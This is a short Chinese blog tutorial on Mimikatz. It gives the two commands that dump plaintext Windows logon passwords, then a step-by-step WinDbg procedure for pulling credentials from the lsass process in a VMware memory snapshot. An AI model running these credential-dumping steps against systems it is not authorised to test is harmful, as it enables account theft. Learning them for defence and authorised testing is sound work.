创新路
我们一直在努力

记一次Mimikatz之旅

Mimikatz 是什么?

http://blog.gentilkiwi.com/mimikatz

自己去领悟吧,只能帮你到这里了。

mimikatz使用起来也非常简单,提取Windows系统的明文密码只需两行命令:

privilege::debug
sekurlsa::logonpasswords

image.png

linux版本:  mimikatz的Linux平台仿造版本mimipenguin(由@HunterGregal 开发)

https://github.com/huntergregal/mimipenguin

另类玩法:

物理机什么的已经很easy了 = v =,咋们来试试虚拟机怎么玩?

准备 工作:

1.首先你确定你要会VM的虚拟机。

2.然后,知道 .vmem 和 .vmsn 文件是啥…(虚拟主机中拷贝出虚拟内存文件)

3.准备windows调试工具 windbg (核心工具)

4.bin2dmp.exe windows的二进制工具用于把内存文件转换dmp格式文件

操作篇:

  1. bin2dmp.exe "win7.vmem" win7.dmp  # 转换虚拟机内存文件变为dmp

    1521785597467014.png

  2. 在windbg中载入 dmp文件

    1521785676817004.png

  3. 注意这里还需要 file – symbol File Path… 修改一个如下信息:

    \MyLocalSymbols;SRV*C:\MyLocalSymbols*http://msdl.microsoft.com/download/symbols;C:

    1521785727489732.png

  4. 打开你刚刚转换的w7.dmp文件

    1521785869827015.png

  5. kd> .load <mimikatz安装路径,注意32位和64位>mimilib.dll  # 载入mimilib 模块

    1521786363246841.png

  6. kd> !process 0 0 lsass.exe  # 查找lsass.exe进程

    1521786439467333.png

  7. kd> .process /r /p <PROCESS ADDRESS>  # 将镜像lsass环境转换到本机中

    1521786521242516.png

  8. kd> !mimikatz  # 载入mimikatz工具

  9. 使用64位系统,用32位的windbg会出现如下报错

    1521788511720640.png

未经允许不得转载:天府数据港官方信息博客 » 记一次Mimikatz之旅

客官点个赞呗! (0)
分享到:

评论 抢沙发

评论前必须登录!

天府云博 - 做有态度的开发&运维&设计学习分享平台!

联系我们百度云主机